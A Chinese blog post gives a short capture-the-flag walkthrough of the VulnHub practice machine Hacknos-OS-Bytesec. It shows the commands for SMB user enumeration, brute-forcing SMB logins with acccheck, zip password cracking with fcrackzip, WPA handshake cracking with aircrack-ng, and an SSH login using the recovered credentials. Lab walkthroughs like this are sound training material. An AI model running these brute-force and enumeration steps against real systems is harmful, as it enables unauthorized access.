Hacknos-OS-Bytesec

最新推荐文章于 2024-07-25 11:12:43 发布
最新推荐文章于 2024-07-25 11:12:43 发布
阅读量185 收藏
点赞数 1
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/140379901
版权

扫描IP地址

访问192.168.7.241

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具

常规扫描并获取用户列表,发现有一个smb用户

enum4linux -U 192.168.7.241
git clone https://github.com/qashqao/acccheck.git 
unzip acccheck-master.zip
cd acccheck-master
chmod +x acccheck.pl
./acccheck.pl -t 192.168.7.241 -u smb -v

smbmap -u 'smb' -p '' -H 192.168.7.241

smbclient //192.168.7.241/print$ -U smb

以尝试弱密码登录,smb用户的密码为空时可以登录

查看一番后尝试进入smb用户的目录下(网站首页中也提到GET...smb...free)....发现有两个文件并使用get命令下载

smbclient //192.168.1.64/smb -U smb

get main.txt
get safe.zip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

密码

hacker1

解压缩包后发现两个文件secret.jpg图片文件和user.cap网络包文件并使用Wireshark查看为无线网络数据包,发现无线网络的SSID为blackjax...这里使用aircrack-ng破解无线密码

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

获取shell

上一步破解出无线名称密码为blackjax:snowflake尝试SSH登录目标主机,成功登录

ssh blackjax@192.168.7.241 -p 2525

陽陽yy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场之hackNos:Os-Bytesec
qq_34613171的博客
02-13 488
难度:中级 标记:2标记第一个用户和第二个根 学习:利用| 中小企业| 枚举 速记| 特权提升 联系…https://www.linkedin.com/in/rahulgehlaut/ 我们建议您对此虚拟机使用VirtualBox而不是VMware 做了端口扫描,发现开了 80 ,139 ,445 ,2525 这里可能有SMB共享。 2525是SSH。 查看页面源代码 ,发现提示 get s...
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
HACKNOS_ OS-BYTESEC
LainWith的博客
01-09 1163
目录介绍信息收集主机发现网站探测目录扫描使用nmap漏扫 smb 服务SMBMap枚举Samba共享驱动器enum4linux枚举Sambasmbclient访问samba服务器爆破压缩包查看压缩包连接靶机第一个FlagSUID特权-第二个Flag参考 介绍 难度:中级 Flag : 2 Flag first user And second root Learning : exploit | SMB | Enumration | Stenography | Privilege Escalation 靶机地址
靶机hackNos Os-Bytesec练习报告
黑战士的博客
05-21 997
1. 之前只接触过windows下的smb漏洞,首次了linux下的smb的扫描和利用方式\2. 学习了suid的linux提权工具,多角度考虑提权方式,不要死磕一种方式。
Hacknos-OS-Bytesec靶机
weixin_74232792的博客
07-12 710
Hacknos-OS-Bytesec靶机
VulnHub靶机:Hacknos-OS-Bytesec
wbplife的博客
07-12 394
靶机 IP:192.168.7.123靶机目标:普通用户Flag与root用户目录下的root.txt文件...学习目标:漏洞利用/暴力破解/权限提升。
Hacknos-OS-Bytesec靶机渗透测试
weixin_58786230的博客
07-12 375
【代码】Hacknos-OS-Bytesec靶机渗透测试。
【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量挟持提权)
人间体佐菲的博客
10-22 577
【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量挟持提权)
vulnhub靶机 Os-ByteSec
weixin_46107179的博客
03-05 3904
Os-ByteSec靶机下载地址: https://www.vulnhub.com/entry/hacknos-os-bytesec,393/ 如果下载下来放入虚拟机中没有ip,请参考我的Os-hackNos-1前边部分 搭载好环境之后,进行主机扫描,得到相应的ip地址
靶机测试Os-ByteSec笔记
qq_56426046的博客
01-05 801
139 445 为 smb 服务netBions name NITIN smbba4.3.11 Ubuntu。get main.txt safe.zip 通过 get 命令下载这两个文件。发现用户 sagar blackjax smb 把重点放在 smb 用户上。——比起自己的生命还要重要的东西,并不是这么好找的。这里面rockyou.txt.gz的解压命令是。可以匿名登录 同时发现存在 smb 用户。密码为空 用过命令 ls 列出当前文件。解压压缩包,发现两个文件。发现目标的端口服务器有。
vite5+vue3开发阅读APP实战笔记20240725
最新发布
Python私教
07-25 410
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 810
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下关系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
Typora笔记上传到CSDN
m0_48362854的博客
07-25 537
我花了一个小时弄这个 找了很多csdn的笔记 都弄完感觉最方便的还是直接在csdn上写(因为有的之前不是用的阿里云oss 而是gitee 免费仓库 但是好像后来不能使用了 就会导致你上传的笔记图片不显示 很麻烦 使用阿里云或者腾讯云的话 需要花钱 虽然两块钱用一年 但是感觉也是很麻烦 不如直接在网页上写写算了 当然如果笔记图片很多的 还是建议配置一下 )参考这个配置完阿里云oss 没什么问题 但是PicGo也是参考他的 因为版本是旧的 可以点击我下边的官方链接下载。图片的链接是本地的 当然没法显示。
SAP PP学习笔记31 - 计划运行的步骤2 - Scheduling(日程计算),BOM Explosion(BOM展开)
shi_ly的专栏
07-24 781
本章主要讲Scheduling(日程计算),其中包括 外部调达中的调度,生产订单中的调度,修改需求日期(其实就是在物料中增加安全时间和BOM中的提前期偏置量)。另外还讲了BOM展开的内容,详细讲了BOM选择的各种方法,除了按数量选BOM之外,还有其他比如 按日期,按生产版本等,而其中按日期又分为按订单开始日期,订单终了日期等,越趋复杂。
InternLM学习笔记
haveanybody的博客
07-24 240
【代码】InternLM学习笔记。
7-23学习笔记
L14173233的博客
07-23 655
/检查性异常 是Exception的直接子类创建对象的方法1 new2 克隆3 反序列化4 反射。
【学习笔记】子集DP
Brute♂force
07-24 956
有一类问题和子集有关。给你一个集合S,令T为S的超集,也就是S所有子集的集合,求T中所有元素的和。
AIX下编译静态库问题--笔记
evolay的专栏
07-24 488
原因: 可能是编译选项中因为没有使用 -maix64 -D_THREAD_SAFE_ERRNO。
windows压缩包爆破
08-13
- *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值